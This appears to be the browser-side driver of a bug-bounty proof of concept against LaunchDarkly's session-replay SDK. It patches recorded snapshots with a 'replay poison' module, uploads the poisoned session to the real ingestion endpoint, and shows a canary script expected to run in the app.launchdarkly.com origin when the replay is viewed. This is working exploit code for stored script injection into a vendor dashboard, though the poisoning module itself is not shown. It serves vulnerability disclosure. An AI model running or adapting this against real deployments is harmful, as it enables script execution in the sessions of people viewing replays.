import { createClient } from "@launchdarkly/js-client-sdk";
import SessionReplay, { LDRecord } from "@launchdarkly/session-replay";
import {
  CASE_ID,
  CONSOLE_MESSAGE,
  installReplayPoison,
  waitForInitialSnapshot,
} from "./replay-poison.js";

const form = document.getElementById("poc-form");
const clientSideIdInput = document.getElementById("client-side-id");
const startButton = document.getElementById("start-poc");
const statusElement = document.getElementById("status");
const resultElement = document.getElementById("result");
const sessionIdElement = document.getElementById("session-id");
const recordedUrlElement = document.getElementById("recorded-url");
const sessionLinkElement = document.getElementById("session-link");
const copySessionButton = document.getElementById("copy-session");
const canaryDetailsElement = document.getElementById("canary-details");
const heatmapInteraction = document.getElementById("heatmap-interaction");

let latestSession = null;

function setStatus(message, level = "working") {
  statusElement.textContent = message;
  statusElement.dataset.level = level;
}

function renderPatchState(state) {
  const phase = state.error
    ? `Patch error: ${state.error}`
    : state.uploaded
      ? "Poisoned recording accepted by the official ingestion endpoint."
      : state.patched
        ? "Serialized full snapshot patched; official upload in progress."
        : state.installed
          ? "Upload-boundary patch installed before recording start."
          : "Loading current session-replay SDK.";
  setStatus(
    `${phase}\nSDK: ${state.sdkVersion}\nSend calls: ${state.sendCalls}\nPatched snapshots: ${state.patchedSnapshots}\nSnapshot retry frames: ${state.retryEvents}\nFinalized: ${state.finalized}\nStopped: ${state.stopped}`,
    state.error ? "error" : state.uploaded ? "success" : "working",
  );
}

async function startPoC(clientSideId) {
  const runId = `${Date.now()}-${crypto.randomUUID()}`;
  history.replaceState(null, "", `?pocRun=${encodeURIComponent(runId)}`);

  const replayPlugin = new SessionReplay({
    manualStart: true,
    privacySetting: "none",
    environment: "launchdarkly-bug-bounty-poc",
    serviceName: "session-replay-zero-click-poc",
    disableBackgroundRecording: true,
    enableCanvasRecording: false,
    // Supported Highlight/LaunchDarkly transport mode. This makes _save()
    // await PushSessionEvents instead of returning after a worker handoff, so
    // the success state means the ingestion endpoint accepted the payload.
    sendMode: "local",
  });
  const context = {
    kind: "user",
    key: `ld-zero-click-poc-${runId}`,
    name: "LaunchDarkly bug bounty triager PoC",
  };

  setStatus("Registering the current official LaunchDarkly plugins…");
  const client = createClient(clientSideId, context, {
    plugins: [replayPlugin],
    streaming: false,
    fetchGoals: false,
  });

  const patch = await installReplayPoison(LDRecord, renderPatchState);
  const initialization = await client.start();
  if (initialization?.status && initialization.status !== "complete") {
    throw new Error(`LaunchDarkly client initialization returned ${initialization.status}`);
  }

  setStatus("Patch installed. Starting one fresh recording…");
  await LDRecord.start({ forceNew: true, sessionKey: `zero-click-poc-${runId}` });
  await waitForInitialSnapshot(patch.record);

  // Generate a genuine rrweb click after recording has started. The serialized
  // fallback in replay-poison.js covers the narrow flush-before-click case.
  heatmapInteraction.click();
  await new Promise((resolve) => setTimeout(resolve, 750));

  if (typeof patch.record._save !== "function") {
    throw new Error("Current recorder no longer exposes the expected bounded save routine");
  }
  patch.record._save();

  const { state } = await Promise.race([
    patch.uploaded,
    new Promise((_, reject) =>
      setTimeout(() => reject(new Error("Timed out waiting for the patched upload")), 20_000),
    ),
  ]);

  latestSession = state.session;
  if (!latestSession?.sessionSecureID || !latestSession?.url) {
    throw new Error("The SDK uploaded data but did not return a session URL");
  }

  sessionIdElement.textContent = latestSession.sessionSecureID;
  recordedUrlElement.textContent = location.href;
  sessionLinkElement.href = latestSession.url;
  canaryDetailsElement.textContent = [
    `console.log(${JSON.stringify(`${CONSOLE_MESSAGE} ${CASE_ID}`)})`,
    `POST ${state.canary?.path}`,
    "Expected origin when replayed in the legacy heatmap: https://app.launchdarkly.com",
  ].join("\n");
  resultElement.classList.add("visible");
}

form.addEventListener("submit", async (event) => {
  event.preventDefault();
  const clientSideId = clientSideIdInput.value.trim();
  if (!clientSideId) {
    setStatus("Enter a LaunchDarkly client-side ID.", "error");
    return;
  }

  startButton.disabled = true;
  clientSideIdInput.disabled = true;
  try {
    await startPoC(clientSideId);
  } catch (error) {
    console.error(error);
    setStatus(String(error?.stack || error), "error");
    startButton.disabled = false;
    clientSideIdInput.disabled = false;
  }
});

copySessionButton.addEventListener("click", async () => {
  if (!latestSession?.sessionSecureID) return;
  await navigator.clipboard.writeText(latestSession.sessionSecureID);
  copySessionButton.textContent = "Copied";
});
